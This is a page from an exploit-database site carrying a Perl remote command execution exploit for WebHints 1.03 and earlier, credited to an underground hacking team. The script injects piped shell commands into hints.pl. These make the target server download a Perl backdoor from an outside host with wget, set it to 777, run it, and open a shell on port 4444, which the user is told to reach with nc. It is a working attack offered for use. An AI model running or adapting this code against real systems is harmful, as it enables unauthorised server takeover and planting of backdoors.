0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
[=================================================================
Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
=================================================================
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: Alpha_Programmer@Yahoo.Com #
# #
#This Xpl Run a backdo0r in Server With 4444 Port. #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- The-CephaleX -- Str0ke #
#And Iranian Security & Technical Sites: #
# #
# TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG #
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & GrayHatz.NeT #
######################################################################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n==============================================\n";
print " \n WebHints Exploit By Alpha_Programmer \n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: <T4rg3t> <Dir> \n\n";
print "==============================================\n\n";
print "Examples:\n\n";
print " Webhints.pl www.Host.com /cgi-bin/ \n";
exit();
}
$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;
$dir = $ARGV[1];
$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";
$req = "GET $dir";
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);
$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
$req2 = "GET $dir";
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";
print $sock2 $req2;
sleep(100);
print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n";
print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n";
print "Enjoy ;)";
### EOF ###
# 0day.today [2024-11-16] #